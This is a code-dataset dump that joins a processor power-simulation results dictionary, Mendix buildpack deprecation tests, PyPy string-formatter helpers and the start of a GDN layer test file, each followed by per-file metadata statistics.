'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00670969,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0174334,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0706924,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.49665,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.238337,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.240103,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.93339,
'Instruction Fetch Unit/Runtime Dynamic': 0.573276,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0562062,
'L2/Runtime Dynamic': 0.0159433,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.56969,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.14185,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0754641,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.075464,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.92604,
'Load Store Unit/Runtime Dynamic': 1.58948,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.186082,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.372163,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.066041,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0668819,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.279585,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0390807,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.549141,
'Memory Management Unit/Runtime Dynamic': 0.105963,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.4078,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0106954,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.123347,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.134042,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.3741,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.239923,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.386987,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.195338,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.822248,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.274404,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.35992,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0100634,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0727718,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0744254,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0727718,
'Execution Unit/Register Files/Runtime Dynamic': 0.0844888,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.15331,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.45823,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.97303,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00195125,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00195125,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.0017352,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000691234,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00106913,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00670683,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.017434,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.071547,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.551,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.238625,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.243006,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.99039,
'Instruction Fetch Unit/Runtime Dynamic': 0.577319,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0578399,
'L2/Runtime Dynamic': 0.0162495,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.60772,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.16145,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0766944,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0766945,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.96988,
'Load Store Unit/Runtime Dynamic': 1.61638,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.189115,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.378231,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0671177,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0679836,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.282965,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0391273,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.55437,
'Memory Management Unit/Runtime Dynamic': 0.107111,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.5219,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0108247,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.124893,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.135718,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.42581,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 1.3390361895736473,
'Runtime Dynamic': 1.3390361895736473,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.281523,
'Runtime Dynamic': 0.180024,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 82.9895,
'Peak Power': 116.102,
'Runtime Dynamic': 19.4683,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 82.708,
'Total Cores/Runtime Dynamic': 19.2883,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.281523,
'Total L3s/Runtime Dynamic': 0.180024,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 74.940919
| 124
| 0.681558
| 8,082
| 68,496
| 5.770354
| 0.064464
| 0.123853
| 0.113217
| 0.093662
| 0.943563
| 0.935672
| 0.922249
| 0.897826
| 0.869307
| 0.850566
| 0
| 0.130101
| 0.224699
| 68,496
| 914
| 125
| 74.940919
| 0.748084
| 0
| 0
| 0.664114
| 0
| 0
| 0.658496
| 0.048177
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64f8d1d8f46c3ae075198a6f1e9a1ed15be8949c
| 968
|
py
|
Python
|
tests/usecase/test_deprecations.py
|
pommi/cf-mendix-buildpack
|
26bfa2aeb94edcb2974e717d18628d2e59fc30ad
|
[
"Apache-2.0"
] | null | null | null |
tests/usecase/test_deprecations.py
|
pommi/cf-mendix-buildpack
|
26bfa2aeb94edcb2974e717d18628d2e59fc30ad
|
[
"Apache-2.0"
] | null | null | null |
tests/usecase/test_deprecations.py
|
pommi/cf-mendix-buildpack
|
26bfa2aeb94edcb2974e717d18628d2e59fc30ad
|
[
"Apache-2.0"
] | null | null | null |
import basetest
class TestCaseDeprecationMx5MPK(basetest.BaseTest):
    """Deploying a Mendix 5.x MPK must fail with a deprecation message."""

    def setUp(self):
        super().setUp()
        deploy_env = {
            "DEPLOY_PASSWORD": self.mx_password,
            "DEVELOPMENT_MODE": True,
        }
        self.setUpCF("mx5.3.2_app.mpk", env_vars=deploy_env)

    def test_mx5_mpk(self):
        # Startup is expected to fail for the unsupported runtime version.
        self.startApp(expect_failure=True)
        self.assert_string_in_recent_logs(
            "Mendix Runtime 5.x is no longer supported"
        )
class TestCaseDeprecationMx5MDA(basetest.BaseTest):
    """Deploying a Mendix 5.x MDA must fail with a deprecation message."""

    def setUp(self):
        super().setUp()
        deploy_env = {
            "DEPLOY_PASSWORD": self.mx_password,
            "DEVELOPMENT_MODE": True,
        }
        self.setUpCF("mx5.3.2_app.mda", env_vars=deploy_env)

    def test_mx5_mda(self):
        # Startup is expected to fail for the unsupported runtime version.
        self.startApp(expect_failure=True)
        self.assert_string_in_recent_logs(
            "Mendix Runtime 5.x is no longer supported"
        )
| 25.473684
| 55
| 0.559917
| 102
| 968
| 5.078431
| 0.401961
| 0.069498
| 0.073359
| 0.092664
| 0.833977
| 0.833977
| 0.833977
| 0.833977
| 0.833977
| 0.833977
| 0
| 0.018868
| 0.342975
| 968
| 37
| 56
| 26.162162
| 0.795597
| 0
| 0
| 0.580645
| 0
| 0
| 0.179752
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 1
| 0.129032
| false
| 0.064516
| 0.032258
| 0
| 0.225806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
64fc04fa72c055c888cc6c2e06ad02b2964a1c0f
| 472
|
py
|
Python
|
pypy/module/_string/formatter.py
|
yxzoro/pypy
|
6e47b3d3e5513d9639a21554963a6ace172ccfee
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
pypy/module/_string/formatter.py
|
yxzoro/pypy
|
6e47b3d3e5513d9639a21554963a6ace172ccfee
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
pypy/module/_string/formatter.py
|
yxzoro/pypy
|
6e47b3d3e5513d9639a21554963a6ace172ccfee
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
def formatter_parser(space, w_unicode):
    """Expose the template formatter's parser for the given app-level string."""
    from pypy.objspace.std.newformat import unicode_template_formatter
    template = space.unicode_w(w_unicode)
    formatter = unicode_template_formatter(space, template)
    return formatter.formatter_parser()
def formatter_field_name_split(space, w_unicode):
    """Expose the template formatter's field-name splitter for the given app-level string."""
    from pypy.objspace.std.newformat import unicode_template_formatter
    template = space.unicode_w(w_unicode)
    formatter = unicode_template_formatter(space, template)
    return formatter.formatter_field_name_split()
| 42.909091
| 75
| 0.817797
| 62
| 472
| 5.870968
| 0.290323
| 0.087912
| 0.263736
| 0.093407
| 0.824176
| 0.824176
| 0.824176
| 0.824176
| 0.824176
| 0.824176
| 0
| 0
| 0.110169
| 472
| 10
| 76
| 47.2
| 0.866667
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
64fd8657213ab2da2c5e7df1c8f28209f10849ca
| 2,545
|
py
|
Python
|
tests/test_layers_gdn.py
|
tallamjr/NeuralCompression
|
21d05ec0d9f8c52d8742fde36f569b4dad2842a5
|
[
"MIT"
] | 233
|
2021-07-19T18:50:21.000Z
|
2022-03-30T22:06:40.000Z
|
tests/test_layers_gdn.py
|
tallamjr/NeuralCompression
|
21d05ec0d9f8c52d8742fde36f569b4dad2842a5
|
[
"MIT"
] | 79
|
2021-07-22T13:33:45.000Z
|
2022-02-09T16:38:42.000Z
|
tests/test_layers_gdn.py
|
tallamjr/NeuralCompression
|
21d05ec0d9f8c52d8742fde36f569b4dad2842a5
|
[
"MIT"
] | 21
|
2021-07-29T18:27:59.000Z
|
2022-02-28T02:32:53.000Z
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import pytest
import torch
from neuralcompression.layers import SimplifiedGDN, SimplifiedInverseGDN
@pytest.mark.parametrize(
    "shape",
